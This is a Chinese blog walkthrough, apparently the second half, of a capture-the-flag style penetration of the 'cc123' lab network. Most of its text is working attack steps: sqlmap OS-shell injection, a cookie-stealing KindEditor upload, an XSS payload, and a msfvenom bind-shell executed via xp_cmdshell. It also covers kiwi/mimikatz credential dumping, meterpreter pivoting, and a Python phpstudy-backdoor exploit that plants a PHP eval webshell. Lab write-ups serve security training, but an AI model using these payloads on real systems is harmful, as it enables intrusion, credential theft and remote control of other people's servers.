细节较多,篇幅较大,分为上/下两部分发布在两篇文章内
另一部分详见下面文章
零基础‘自外网到内网’渗透过程详细记录(cc123靶场)——上https://blog.csdn.net/weixin_62808713/article/details/143572185
八、第二层数据库服务器权限获取
猜到新闻资讯内存在注入漏洞。
抓包进行验证。
将数据包粘贴到kali内。
vim cc123_sql.txt
使用sqlmap尝试注入。
sqlmap -r cc123_sql.txt --dbms mssql -v 1 --batch
查看其数据库。
sqlmap -r cc123_sql.txt --dbms mssql -v 1 --batch --dbs
查看当前数据库及其用户。
sqlmap -r cc123_sql.txt --dbms mssql -v 1 --batch --current-db --current-user
获取到了当前站点使用的数据库后,获取其相关的详细信息。
查看数据库grcms_data的表信息。
sqlmap -r cc123_sql.txt --dbms mssql -v 1 -D grcms_data --tables
看到名为admin的表,扫描其内信息,至此拿到了用户名及密码信息。
sqlmap -r cc123_sql.txt --dbms mssql -v 1 -D grcms_data -T admin --dump
接下来查看其是否能执行shell,发现可以执行。
sqlmap -r cc123_sql.txt --dbms mssql -v 1 --os-shell
执行命令看是否有回显,发现成功扫描到两个ip地址。
ipconfig
根据上面扫描到的ip地址,可以判断该网站采用站库分离,即web程序和数据库不在同一个服务器内,可以提高安全性。
查看当前权限,发现是系统权限。
whoami
至此,拿到了数据库服务器的系统权限。
九、.net代码审计
打开蚁剑查看服务器的目录。
C:/HwsHostMaster/wwwroot
访问目录C:/HwsHostMaster/wwwroot
cd C:/HwsHostMaster/wwwroot
dir
可以看到这里存在三个网站。
切换到ww2.cc123.com后并查看。
cd ww2cc123_55m39g
dir
进入到web目录下并查看。
cd web
dir
可以看到其存在上述文件,但是并没有看到html后缀的文件,发现站点是做了伪静态。
进入到bin目录下并查看文件。
cd bin
ls
切换到bin目录的上一级下载bin目录。
cd..
download bin
将下载的文件全部复制到本地。
首先将下载的文件移动到kali的桌面上。
mv bin /home/kali/Desktop
将其复制到本地。
这里即为网站的源代码。
接下来使用ILSpy工具逆向DLL文件进行分析。
查看admin目录下的文件。
查看login.aspx文件,可以看到App_Web_login.aspx。
cat login.aspx
回到本地内找一下App_Web_login.aspx,将其拖拽到工具内。
可以看到下面验证登录的代码。
审计这部分代码,发现其验证码错误后会进行返回,如果验证码正确的话会继续向下执行,但是这里验证码并没有被注销,这就导致验证码重用的漏洞,存在密码爆破的风险。
继续审计,发现下图所示的部分的代码导致其存在注入风险。
查看之前的数据包,发现有个newsadd.aspx。
回到本地内找到后将其拖拽到工具内。
可以看到下图位置也存在sql注入。
经过具体的分析后,发现任意的后台文件都存在sql注入。
进入到网页的后台内,查看其编辑器,发现其使用的是KindEditor。
这个编辑器存在漏洞,可以进行文件上传,包括html文件和txt文件等。
使用burp抓包上传html文件获取cookie。
下面代码可以获取cookie。
回到网页内将上面的html文件上传并抓包。
选择html文件。
抓取到下图所示数据包。
将数据包发送到repeater。
将下图所示位置修改成file。
放包后发现上传成功。
访问html文件,成功获取到了cookie。
ww2.cc123.com/editor/asp.net/../attached/file/20240903/20240903162048_4230.html
下面来审计文件上传漏洞。
使用编辑器上传一个文件并抓包,发现其地址内有一个newsadd.aspx。
回到本机机内找到这个文件并审计。
Ctrl+F查找upload,找到上传部分的代码。
发现其对上传的文件的后缀名进行了白名单验证,这里并不存在漏洞。
接下来返回到后台页面内,进行xss漏洞挖掘。
回到kali内查看web文件夹内的前台文件。
dir
查看文件mystat.aspx。
cat mystat.aspx
发现其存在XSS漏洞。
访问mystat.aspx文件。
点击查看页面源代码。
源代码如下,测试可以看到其style字段可控。
根据源代码,写入XSS语句。执行后成功看到了弹窗。
http://ww2.cc123.com/mystat.aspx?style=</script><script>alert(/xss/);</script><script>
至此,通过代码审计,后台页面内XSS漏洞挖掘完成。
十、编写DESC解密工具
查看web.Config文件。
cat web.Config
可以看到其数据库连接信息。
复制后回到之前上传的ASPXSpy2014.aspx内。
http://new.cc123.com/a/ASPXSpy2014.aspx
点击DataBase,将前面复制的数据库信息输入。
server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123..
下图所示成功连接。
点击下面展示出来的TABLE_NAME,就可以把对应的sql语句显示在上面。
点击Query即可得到表内的信息。
这里就可以拿到用户名密码信息。
- admin AE5F6187F32825CA
- cc123 B97C57DB005F954242450A255217DA9F
尝试进行md5解密,发现均不成功。
再次利用ILSpy工具逆向分析其加密代码。
点击重新加载。
将后台登录文件拖入到工具内。
可以看到在密码部分的sql语句后面有一个字符串处理,包含一个key值。
点击进入Encrypt即为其加密方法。
其解密方法在加密方法的上方。
拿到上面的信息就可以编写解密工具了。
使用VS新建windows窗体应用程序项目。
在工具箱内选择添加组件,将其拖拽到下面。
给组件一个名字。
名字:DESC解密工具
接下来添加三个文本框,选择后将其拖拽到下面。
添加button组件。
将其命名为解密。
添加label标签。
分别命名。
调整细节。
添加名称。
名称:ranzi
双击“解密”进入编写解密代码。
复制刚刚的解密函数稍作更改后即可。
利用编写的解密工具解密得到用户名和对应的密码为:
- admin cc123
- cc123 qweasd123
十一、内网渗透
获取Web服务器路由信息,成功获取到了路由信息如下。
run get_local_subnets
接下来准备获取哈希值及明文密码。
首先做一下进程迁移,防止出错。
执行help命令查找终端。
help
执行ps命令找到vmtoolsd.exe进程,记住其进程号。
执行迁移命令。
migrate 1488
如下图所示即为迁移完成。
然后退出一下,然后进入一个新的会话。
background
sessions -i 2
加载Kiwi插件。
load kiwi
请求Kiwi获取调试权限,然后从系统的安全账户管理器(SAM)数据库中提取用户账户信息,包括用户名和哈希密码。
kiwi_cmd privilege::debug
kiwi_cmd "lsadump::sam"
提取当前登录用户的密码信息,包括明文密码和哈希值。
kiwi_cmd "sekurlsa::logonPasswords"
成功获取到了超级管理员的账号和密码明文。
整理前面获取到的信息,准备进行内网渗透:
- 192.168.10.134
- 10.10.10.128
- Local subnet: 10.10.10.0/255.255.255.0
- Local subnet: 192.168.10.0/255.255.255.0
- Administrator !@#Qwe123.
根据前面获取到的信息开始进行多重网段的内网渗透。
首先给web服务器进行添加路由。
run autoroute -s 10.10.10.0/24
验证是否成功添加。
run autoroute -p
退出一下准备启用代理模块。
background
调用模块并查看其需要的配置。
use auxiliary/server/socks_proxy
show options
修改配置信息。
set srvport 2222
开始执行。
run
验证前面操作是否成功。
首先修改配置文件。
vim /etc/proxychains4.conf
之后就可以进行内网扫描了。
proxychains nmap -sT -Pn 10.10.10.136
利用前面获取到的数据库的权限,获取数据库服务器网卡信息。
ipconfig
可以看到存在一个10.10.1.128的ip。
之后,要生成一个正向攻击载荷。
msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe >bind.exe
将生成的攻击载荷移动到桌面。
mv bind.exe /home/kali/Desktop
访问之前上传的ASPXSpy2014.aspx。
http://new.cc123.com/a/ASPXSpy2014.aspx
选择SA_Upfile将刚刚生成的攻击载荷上传。
选择前面移动到桌面的攻击载荷。
添加上传路径后点击上传。
c:/bind.exe
上传成功后选择XP_cmdshell exec进行执行。
修改执行语句后点击Query。
Exec master.dbo.xp_cmdshell 'c:/bind.exe'
接下来准备开始监听。
选择模块。
use exploit/multi/handler
设置payload。
set payload windows/meterpreter/bind_tcp
配置监听地址。
set rhost 10.10.10.136
配置监听端口。
set lport 13777
开始监听。
run
成功连接。
查看当前权限。
getuid
可以看到已经是系统权限。
十二、获取数据库服务器哈希和明文
查看服务器网卡信息。
ipconfig
可以看到两个ip信息:
首先做一下进程的迁移。
首先查看进程。
ps
执行迁移命令。
migrate 1548
然后退出一下,进入一个新的会话。
background
sessions -i 2
加载Kiwi插件。
load kiwi
请求Kiwi获取调试权限,然后从系统的安全账户管理器(SAM)数据库中提取用户账户信息,包括用户名和哈希密码。
kiwi_cmd privilege::debug
kiwi_cmd "lsadump::sam"
提取当前登录用户的密码信息,包括明文密码和哈希值。
kiwi_cmd "sekurlsa::logonPasswords"
下图成功获取到了超级管理员的账号和密码明文。
进入到shell内。
shell
查看数据库主机名。
hostname
看完之后crtl+z退出。
查看数据库服务器的路由。
run get_local_subnets
可以看到路由信息如下:
- Local subnet: 10.10.1.0/255.255.255.0
- Local subnet: 10.10.10.0/255.255.255.0
配置添加路由。
run autoroute -s 10.10.1.0/24
验证。
run autoroute -p
扫描10.10.1.129。
proxychains nmap -sT -Pn 10.10.1.129
可以看到其开放80端口,尝试使用代理进行访问,访问后可以看到其是phpstudy的页面。
proxychains3 firefox http://10.10.1.129
根据前面获取到的信息,确认其版本为5.4.45。
phpstudy的2016、2014、2018的php-5.2.17、php-5.4.45版本均存在后门。
十三、利用python编写phpstudy后门利用工具
确认漏洞的存在后,接下来进行编写后门利用工具。
创建phpstudy.py文件。
vim phpstudy.py
代码编写如下。
#conding:utf-8
import requests
import sys
import base64
shell = "system('"+sys.argv[1]+"');"
shell_base64 = base64.b64encode(shell.encode('utf-8'))
header={'Accept-charset':shell_base64,'Accept-Encoding':'gzip,deflate'}
def exploit(url):
html = requests.get(url=url,headers=header).text
return html
url = "http://10.10.1.129/"
print(exploit(url))
"echo ^<?php @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"
执行上述py文件,向服务器写一个一句话木马。
proxychains3 python3 phpstudy.py "echo ^<?php@eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"
访问写入的shell.php文件,发现成功上传了。
十四、SocksCap代理访问目标WEB服务器
为了更方便访问,使用SocksCap代理访问第三层服务器。
双击安装SocksCap代理工具。
点击下一步。
点击我接受。
选择位置后点击安装。
点击完成结束安装。
双击启动。
复制kali的ip。
192.168.10.132
回到SocksCap代理工具内,点击新增代理。
点击编辑其ip,将kali的ip填入。
端口更改为2222。
代理类型更改为sock4。
此时点击保存即可。
保存完成后可以点击进行测试。
测试正常后就可以代理一些应用程序了,这里代理中国菜刀。
找到中国菜刀的exe程序。
将其拖拽到代理工具内。
选中程序右键点击后选择在代理隧道中运行选中程序。
在弹出的页面内右键后点击添加。
将前面上传到服务器上的shell添加上去,然后填入密码,设置为UTF-8,最后点击添加。
添加完成后双击即可进行访问。
退出后右键即可进入虚拟终端。
进入终端后执行whoami命令。
whoami
可以看到已经是系统权限。
十五、metasploit正向连接目标WEB服务器
将之前在kali内生成的bind.exe上传到服务器内。
通过终端执行刚刚上传的exe。
c:\bind.exe
退出一下。
background
查看当前配置信息。
show options
修改配置信息。
set RHOST 10.10.1.129
执行后查看其权限,发现是系统权限。
run
getuid
执行线程迁移操作。
migrate 1340
进入shell后即可查看当前所在网段有无其它主机。
shell
arp-a
至此拿到了第三层服务器的系统权限。
十六、Flag获取
1.第一个flag
首先进入到wwwroot目录下。
cd C:/HwsHostMaster/wwwroot/
查看目录下内容,并进入ww2cc123_55m39g目录。
dir
cd ww2cc123_55m39g
进入到web目录下并查看。
cd web
dir
进入到upimg目录下然后查看目录内容。
cd upimg
dir
在此可以看到一个flag文件,查看后即可得到第一个flag。
cat flag.txt
2.第二个flag
进入到c盘根目录下并查看。
cd c:/users
dir
看到Administrator文件夹,进入并查看。
cd Administrator
dir
在此可以看到一个flag文件,查看后即可得到第二个flag。
cat flag2.txt
3.第三个flag
连接到数据库服务器。
进入c盘并查看文件。
cd c:/users
dir
看到Administrator文件夹,进入并查看。
cd Administrator
dir
在此可以看到一个名为root.txt.txt文件,查看后即可得到第三个flag。
cat root.txt.txt
4.第四个flag
连接到第三城的服务器后进入c盘。
cd :\\users
dir
看到Administrator文件夹,进入并查看。
cd Administrator
dir
在此可以看到一个名为root.txt.txt文件,查看后即可得到第四个flag。
cat root.txt
至此,获取到了全部的flag。
~: BurpSuit
m0_74886686: BurpSuit
laoziaaa: Burp Suit
ranzi.: 重新配置一下java环境
ac1c7c8: 在命令指示符下输入java可以运行,但是javac运行不了